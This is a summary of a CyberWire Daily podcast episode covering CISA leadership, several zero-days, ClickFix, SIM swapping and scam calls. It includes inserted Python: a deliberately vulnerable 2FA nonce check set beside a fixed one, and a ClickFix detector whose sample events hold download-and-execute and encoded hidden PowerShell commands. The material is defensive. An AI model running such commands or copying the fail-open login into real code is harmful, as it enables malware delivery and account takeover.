CyberWire Daily: A New Era for CISA Under Trump?
Release Date: November 18, 2024
Host: Dave Bittner
Guest: Rob Boyce, Global Lead for Cyber Resilience at Accenture
1. Leadership Transition at CISA
Jenn Easterly’s Departure
In a significant development, Jen Easterly, the esteemed Director of the Cybersecurity and Infrastructure Security Agency (CISA), announced her resignation effective January 20, 2025, coinciding with the inauguration of President-elect Donald Trump. A CISA spokesperson confirmed that this transition is standard practice during a change in administration.
Easterly’s Legacy
Easterly, a West Point graduate and Rhodes Scholar, has been a pivotal figure in U.S. cybersecurity. With two decades in the U.S. Army, she played a crucial role in establishing U.S. Cyber Command following a major Department of Defense malware incident in 2008. Her career also spans senior positions at the NSA, the National Security Council, and Morgan Stanley. She assumed the role of CISA director after an eight-month vacancy following the dismissal of Chris Krebs in 2020.
Under her leadership, CISA advanced the Secure by Design initiatives, encouraging manufacturers to integrate security into their products from inception. She steered the agency through major cyberattacks, including persistent Chinese hacks targeting U.S. officials, and provided unwavering leadership during election cycles to uphold the integrity of election infrastructure. Additionally, Easterly issued guidance on emerging technologies such as artificial intelligence (AI) and quantum cryptography.
Future Uncertainties for CISA
Easterly’s departure raises questions about CISA’s future direction under the Trump administration. GOP critics have leveled allegations of censorship against CISA, coupled with proposed budget cuts, sparking concerns over the agency’s cybersecurity priorities moving forward. Senator Rand Paul, a vocal CISA critic, is poised to lead the Senate Homeland Security panel, adding to the uncertainty. Ohio Secretary of State Frank LaRose is reportedly a contender to succeed Easterly, but the agency’s path remains uncertain as these leadership changes unfold.
2. DHS Releases AI Framework for Critical Infrastructure
Roles and Responsibilities Framework
The Department of Homeland Security (DHS) has unveiled the Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure, a comprehensive guide aimed at securing AI development and deployment within essential sectors. This framework provides voluntary recommendations tailored for cloud providers, AI developers, critical infrastructure operators, civil society, and public sector organizations.
Key Focus Areas
- Securing Environments: Emphasizes the protection of cloud supply chains and data centers while mandating the reporting of anomalies.
- Responsible System Design: Encourages AI developers to adopt secure-by-design practices, address inherent biases, and ensure data privacy.
- Data Governance: Highlights the importance of robust data management strategies to safeguard sensitive information.
- Safe Deployment: Stresses the need for transparent AI usage and the implementation of fail-safes to prevent misuse.
- Performance Monitoring: Advocates for continuous oversight to ensure AI systems operate within safe parameters.
Secretary Alejandro Mayorkas’s Insights
DHS Secretary Alejandro Mayorkas underscored the framework’s critical role in protecting vital services such as water and power. He described the framework as a “living document” that will evolve alongside advancements in AI technology, ensuring that cybersecurity measures remain proactive and adaptive to emerging threats.
3. Palo Alto Networks’ Critical Zero-Day Vulnerability Exploited
Vulnerability Details
Palo Alto Networks has confirmed the active exploitation of a critical zero-day vulnerability in its firewall products, particularly affecting management interfaces exposed to the internet. Rated 9.3 out of 10 in severity, this flaw allows unauthenticated remote command execution, posing a significant threat until a patch is deployed.
Mitigation Strategies
Until a patch is available, Palo Alto Networks advises users to restrict access to management interfaces strictly to internal, trusted IP addresses. Implementing this measure reduces the vulnerability’s severity to 7.5 but necessitates diligent monitoring for any suspicious activities. The company has observed malicious activities from specific IP addresses, including potential misuse of third-party VPN services, and has detected malicious code on affected devices.
Additional Vulnerabilities
Beyond the primary zero-day, Palo Alto Networks disclosed other vulnerabilities in its Expedition Migration tool, including OS command and SQL injection flaws that could expose sensitive firewall configurations. Users are urged to apply available fixes promptly to secure their systems.
4. Sextortion Scams Exploiting Microsoft 365 Admin Portal
Method of Exploitation
Cybercriminals are leveraging the Microsoft 365 admin portal to dispatch sextortion emails that appear legitimate, effectively bypassing traditional spam filters. These scams typically claim that hackers have accessed compromising images or videos of victims and demand cryptocurrency payments to prevent their release.
Attack Vector
The perpetrators exploit the Microsoft Message Center’s Share feature, which is intended to forward notifications with personal messages. Although the Share field is limited to 1,000 characters, attackers manipulate browser development tools to input longer messages, circumventing server-side restrictions. Microsoft is currently investigating these exploits but has not yet implemented fixes.
Impact
Sextortion scams have been prevalent since 2018, causing significant distress to recipients. The abuse of legitimate platforms like Microsoft 365 exacerbates the issue, making it easier for scammers to appear trustworthy and evade detection.
5. China-Based APT41 Exploits Fortinet’s Windows VPN Zero-Day
DEEPDATA Malware Framework
Chinese Advanced Persistent Threat group APT41, also known as Brazen Bamboo and associated with the LightSpy malware, is actively exploiting a zero-day vulnerability in Fortinet's Windows VPN client. This exploitation facilitates the theft of credentials and the deployment of the DEEPDATA malware framework.
Capabilities of DEEPDATA
DEEPDATA employs plugins to extract sensitive information from browsers, communication applications, and password managers. Additionally, it can record audio through the system’s microphone, providing comprehensive surveillance capabilities.
Vulnerability Status
The zero-day vulnerability, reported to Fortinet in July, remains unpatched and lacks an official CVE identifier. The exploit allows APT41 to conduct extensive surveillance and data exfiltration, particularly targeting journalists, politicians, and activists in Southeast Asia.
Malware Evolution
A new Windows variant of LightSpy has been identified, showcasing APT41’s expanding multi-platform surveillance strategies. The persistence and adaptability of APT41 underline the escalating sophistication of cyber threats emanating from state-sponsored groups.
6. EPA Reports Vulnerabilities in U.S. Drinking Water Systems
Scope of Vulnerabilities
The Environmental Protection Agency’s Office of Inspector General (EPA OIG) has identified cybersecurity vulnerabilities in over 300 U.S. drinking water systems, serving approximately 110 million people. These vulnerabilities pose significant risks, including service disruptions, denial-of-service (DoS) attacks, and the compromise of customer data.
Severity of Issues
- Critical or High Severity: Found in 97 systems serving 27 million individuals.
- Medium and Low Severity: Detected in 211 systems covering 83 million people.
Common Vulnerabilities
The identified weaknesses span various domains including email security, IT hygiene, and threat detection mechanisms. Notably, open portals on some systems expose them to potential exploitation.
EPA’s Response and Concerns
The OIG emphasized that exploiting these vulnerabilities could lead to catastrophic damage to water infrastructure. Furthermore, the EPA currently lacks a dedicated cybersecurity incident reporting system, relying instead on CISA for coordination—which raises concerns about the efficiency and effectiveness of emergency response and mitigation efforts.
7. Critical Authentication Bypass in WordPress Plugin
Vulnerability Overview
A severe authentication bypass vulnerability has been discovered in the Really Simple Security plugin for WordPress, which is utilized by over 4 million websites. This plugin offers SSL configuration, two-factor authentication (2FA), and security monitoring.
Technical Details
The flaw originates from improper handling of the login nonce parameter in the plugin's 2FA REST API. When login nonce verification fails, the plugin erroneously authenticates users based solely on their user ID, allowing attackers to gain administrative access to vulnerable sites.
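The failure mode described above, as an added schematic illustration that is not the Really Simple Security plugin's own PHP code: the plugin's real control flow, function names and storage are not on this page and are not reproduced. The model in Python reproduces only the described logic, a nonce check whose failure does not stop the request, beside the fail-closed form. The secret, user table and nonce format are constructed for the example.

```python
"""Schematic model of a 2FA login-nonce check (added illustration; not the
Really Simple Security plugin's PHP code). The plugin's real control flow,
function names and storage are not on the page and are not reproduced here.
The model reproduces only the failure mode the advisory describes: a failed
nonce check that falls through to authentication by user ID alone."""
import hashlib
import hmac
import secrets
import time
from typing import List, Optional

# Constructed sample data for this example: a server-side secret and a user
# table mapping user ID to role.
SERVER_SECRET = secrets.token_bytes(32)
NONCE_TTL_SECONDS = 300
USERS = {1: "administrator", 7: "subscriber"}
AUDIT_LOG: List[str] = []


def issue_login_nonce(user_id: int, now: Optional[float] = None) -> str:
    """Issue a nonce bound to one user ID: timestamp plus an HMAC over both."""
    ts = int(now if now is not None else time.time())
    mac = hmac.new(SERVER_SECRET, f"{user_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_login_nonce(user_id: int, nonce: str, now: Optional[float] = None) -> bool:
    """True only for a well-formed, unexpired nonce whose MAC matches this user ID."""
    try:
        ts_str, mac = nonce.split(".", 1)
        ts = int(ts_str)
    except (AttributeError, ValueError):
        return False
    current = now if now is not None else time.time()
    if current - ts > NONCE_TTL_SECONDS:
        return False
    expected = hmac.new(SERVER_SECRET, f"{user_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def finish_2fa_login_vulnerable(user_id: int, nonce: str) -> Optional[str]:
    """Flawed pattern: the failed check is recorded but does not end the
    request, so a session is created from the caller-supplied user ID alone.
    Returns the role the caller is now logged in as."""
    if not verify_login_nonce(user_id, nonce):
        AUDIT_LOG.append(f"nonce check failed for user {user_id}")
        # Bug: execution continues instead of returning here.
    return USERS.get(user_id)


def finish_2fa_login_fixed(user_id: int, nonce: str) -> Optional[str]:
    """Hardened pattern: fail closed. No valid nonce for this user, no session."""
    if not verify_login_nonce(user_id, nonce):
        AUDIT_LOG.append(f"nonce check failed for user {user_id}; login rejected")
        return None
    return USERS.get(user_id)


def expired_nonce(user_id: int) -> str:
    """Helper for the demonstration: a nonce issued well past the TTL."""
    return issue_login_nonce(user_id, now=time.time() - 2 * NONCE_TTL_SECONDS)


if __name__ == "__main__":
    bogus = "0.deadbeef"
    print("vulnerable, bogus nonce ->", finish_2fa_login_vulnerable(1, bogus))  # administrator
    print("fixed, bogus nonce      ->", finish_2fa_login_fixed(1, bogus))  # None
    print("fixed, valid nonce      ->", finish_2fa_login_fixed(1, issue_login_nonce(1)))  # administrator
    print("fixed, other user nonce ->", finish_2fa_login_fixed(1, issue_login_nonce(7)))  # None
```

The two functions differ by a single `return None`; that is the whole bug class. Binding the nonce to the user ID in the MAC also closes the sibling mistake of accepting a nonce issued for a different account, and the TTL bounds how long a captured nonce stays useful.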
Exploitation and Impact
Given the nature of this vulnerability, it can be exploited at scale using automated scripts, posing a widespread threat to WordPress sites globally. Wordfence discovered the vulnerability on November 6 and released fixes earlier this month. Web administrators and hosting providers are urged to update the plugin immediately to mitigate the risk.
8. Rise in ClickFix Social Engineering Techniques
Emerging Threat: ClickFix
Researchers at Proofpoint have identified a significant uptick in the ClickFix social engineering technique. This method manipulates users into executing malicious PowerShell scripts by masquerading them as solutions to fabricated technical problems.
Operational Mechanics
ClickFix exploits trust by presenting fake error messages or software update prompts, prompting users to copy and run PowerShell commands that deliver malware. Recent campaigns have utilized fake CAPTCHA verifications, GitHub notifications, and spoofed emails from platforms like Microsoft Word and ChatGPT.
Malicious Payloads
The payloads delivered through ClickFix include:
- AsyncRAT
- NetSupport
- Lumma Stealer
- XWorm
These malicious scripts bypass traditional security controls by exploiting human error and the desire for users to independently resolve perceived issues.
Prevalence and Evolution
Initially linked to campaigns by threat actors TA571 and ClearFake, ClickFix has now been adopted by a broader range of financially motivated and espionage-focused attackers. This evolution underscores the dynamic nature of social engineering strategies and the necessity for robust user education and awareness.
Mitigation Strategies
Organizations are advised to:
- Train users to recognize deceptive tactics.
- Avoid manually executing unverified PowerShell commands.
- Implement advanced threat detection systems to monitor for suspicious script activities.
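The third recommendation, monitoring for suspicious script activity, as an added example that is not Proofpoint's code or detection content: a small scorer in Python over constructed process-creation events of the kind an EDR or Sysmon Event ID 1 would record. It keys on what the lure produces, a PowerShell process started directly from the desktop shell with a pasted command line, rather than on any one campaign's payload. The event field names, weights and threshold are assumptions made for this example.

```python
"""ClickFix-style PowerShell execution heuristics, added here as an
illustration (not Proofpoint's code or detection content). It scores
constructed process-creation events of the kind an EDR or Sysmon Event ID 1
records; the field names, weights and threshold are assumptions made for this
example and would be tuned against a real environment's baseline."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


POWERSHELL_BINARIES = {"powershell.exe", "pwsh.exe"}
# A shell started straight from the desktop shell means a human typed or
# pasted it (Run dialog, terminal opened by hand): exactly the ClickFix lure.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits that are routine for a pasted "fix" but rare for
# scheduled or administrator-driven scripts.
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
ENCODED_COMMAND = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_AND_RUN = re.compile(
    r"(?:invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b)", re.I)
POLICY_BYPASS = re.compile(r"-(?:nop\b|noprofile|ep\s+bypass|executionpolicy\s+bypass)", re.I)

THRESHOLD = 4  # assumed; tune against your own baseline


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one process-creation event."""
    reasons: List[str] = []
    if _basename(ev.image) not in POWERSHELL_BINARIES:
        return 0, reasons
    score = 0
    cl = ev.command_line
    if _basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("PowerShell launched directly from explorer.exe (Run dialog or pasted command)")
    if HIDDEN_WINDOW.search(cl):
        score += 2
        reasons.append("hidden window requested")
    if ENCODED_COMMAND.search(cl):
        score += 2
        reasons.append("base64-encoded command")
    if DOWNLOAD_AND_RUN.search(cl):
        score += 3
        reasons.append("download-and-execute cmdlet pattern")
    if POLICY_BYPASS.search(cl):
        score += 1
        reasons.append("profile or execution-policy bypass switch")
    return score, reasons


def triage(events: List[ProcessEvent], threshold: int = THRESHOLD) -> List[Tuple[int, int, List[str]]]:
    """Indices, scores and reasons of events at or above the threshold."""
    flagged = []
    for idx, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((idx, score, reasons))
    return flagged


# Constructed sample events: two routine launches, one unrelated process,
# and two that look like a user pasted a "fix" from a fake error page.
# The base64 blob and the URL are placeholders, not real payloads.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
                 r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Service -Name WinRM",
                 r"CORP\admin.jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -NoP -enc JABjAD0AJwBjAG8AbgBzAHQAcgB1AGMAdABlAGQAJwA=",
                 r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoP -c \"iex (iwr 'https://captcha-check.invalid/fix.txt')\"",
                 r"CORP\jdoe"),
]

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{score}] {ev.user}: {ev.command_line}")
        for r in reasons:
            print("   -", r)
```

The parent-process signal is the one worth keeping even if every command-line pattern is rewritten by the next campaign: an ordinary user has little reason to start PowerShell from the Run dialog, so that pairing alone is a good hunting query, and the remaining terms only raise confidence. The scheduled backup in the sample scores low despite using `-NoProfile`, which is why a single switch should not be an alert on its own.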
9. Swatting Conviction: Consequences and Implications
Case Overview
An 18-year-old named Alan Filion has pleaded guilty to orchestrating over 375 fake emergency threats, a practice known as swatting. Between 2022 and 2024, Filion targeted religious and educational institutions, government officials, and individuals across the United States, beginning his activities at the age of 16.
Methodology
Swatting involves falsely reporting emergencies to prompt SWAT team responses, often resulting in chaos, property damage, and endangered lives. Filion utilized social media platforms to advertise swatting services for a fee, boasting about his ability to cause police detentions and searches based on fabricated crimes.
Legal Consequences
Filion faces up to five years in prison for each of four felony counts. His sentencing is scheduled for February, highlighting the legal system’s stance against such malicious activities.
Broader Implications
This case underscores the growing threat of swatting, emphasizing the need for law enforcement and cybersecurity professionals to develop strategies to prevent and respond to such incidents effectively.
10. Guest Interview: Rob Boyce on SIM Swapping Services Targeting Telcos
Introduction
Rob Boyce, Global Lead for Cyber Resilience at Accenture, joined the CyberWire Intel Briefing to discuss the emerging trend of SIM swapping services targeting telecommunications companies.
Emerging SIM Swapping Threats
Rob Boyce (14:08): “SIM swapping as you said, it's nothing new. But what we're seeing now is super interesting—threat actors offering services for resetting passwords or MFA bypass via SIM swap through what we believe is an API exploit.”
API Exploits and Increased Vulnerability
Historically, SIM swapping required insider access or sophisticated social engineering. However, Boyce highlights a novel approach where threat actors are exploiting APIs to facilitate mass SIM swaps without direct human manipulation.
Service Offerings and Pricing
The threat actor is monetizing this exploit by offering:
- One-Time SIM Swap: Purchasing a single number for $4,000 to $7,000.
- Full Rights to the Exploit: Granting broader access for approximately $15,000.
Boyce anticipates these prices will fluctuate as the exploit becomes more widespread and competitive.
Impact on Telcos and Security Measures
This unprecedented method allows for rapid and large-scale SIM swaps, posing substantial risks to telecommunications providers and their customers. Boyce emphasizes the need for Multi-Factor Authentication (MFA) improvements, noting that SMS-based MFA is particularly vulnerable to such attacks.
Future of Authentication
Rob Boyce (21:16): “MFA is maturing, and the future lies in passwordless authentication with standards like FIDO2 or PassKey, which replace passwords with cryptographic keys, enhancing security and user experience.”
Recommendations
Organizations should:
- Transition from SMS-based MFA to more secure, passwordless authentication methods.
- Implement robust MFA solutions that are resilient against API exploits and social engineering.
- Continuously monitor and update security protocols to mitigate evolving threats.
Conclusion
Boyce underscores the critical importance of evolving authentication practices to safeguard against advanced SIM swapping techniques, advocating for a shift towards more secure and user-friendly authentication standards.
11. Caller ID Desk: FTC’s Battle Against Scam Calls
Progress in Reducing Scam Calls
The Federal Trade Commission (FTC) reports a 50% reduction in complaints about scam and nuisance calls since 2021, marking a significant victory for the agency’s ongoing efforts. In 2024, the FTC received 2 million complaints, primarily focused on medical and prescription scams and imposter calls.
Types of Scams
- Robocalls: Accounted for 53% of complaints.
- Human Scammers: Made up 37%, often involving unsolicited sales attempts.
FTC’s Initiatives
The FTC is not complacent despite the progress. It has introduced new rules and initiatives such as the Impersonation Rule and Operation Stop Scam to intensify crackdowns on both scammers and the businesses that profit from fraudulent activities. Additionally, the FTC is addressing the rising threat of deepfake phone scams through a voice cloning challenge, recognizing the increasing sophistication of AI-driven scams.
Sam Levine’s Statement
Sam Levine, Head of the FTC’s Bureau of Consumer Protection: “Illegal calls remain a scourge. But we're making progress, with scams still costing consumers over $1 billion last year. There's plenty more work ahead.”
Consumer Advice
Levine advises consumers to remain vigilant, suggesting that unknown numbers should be sent directly to voicemail to prevent falling victim to these ongoing scams.
Conclusion
The November 18, 2024 episode of CyberWire Daily provided a comprehensive overview of pivotal cybersecurity developments, from leadership changes within CISA to emerging threats like API-driven SIM swapping and sophisticated social engineering techniques. Guest insights from Rob Boyce highlighted the evolving landscape of authentication security, while the FTC's achievements in reducing scam calls offered a glimpse of progress in combating consumer fraud. As cybersecurity threats continue to adapt and expand, the episode underscored the necessity for continuous vigilance, advanced security measures, and proactive policy frameworks to safeguard critical infrastructure and protect consumers.
Notable Quotes:
- Rob Boyce (17:36): “This is the first time that we're actually seeing a real exploit being used against six major US telcos, and the credibility of this claim is pretty high at this point.”
- Rob Boyce (21:16): “The future of MFA is really passwordless authentication with the adoption of open standards like FIDO2 or PassKey, which replace passwords with cryptographic keys.”
- Sam Levine (Caller ID Desk): “Illegal calls remain a scourge. But we're making progress, with scams still costing consumers over $1 billion last year.”
Produced by: Liz Stokes
Mixer: Trey Hester
Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Eiben
Executive Editor: Brandon Karpf
President: Simone Petrella
Publisher: Peter Kilpe
Host: Dave Bittner
For more detailed information on today’s stories, visit CyberWire Daily Briefing. To stay ahead in the rapidly evolving world of cybersecurity, subscribe to the CyberWire Daily and ensure you never miss an update.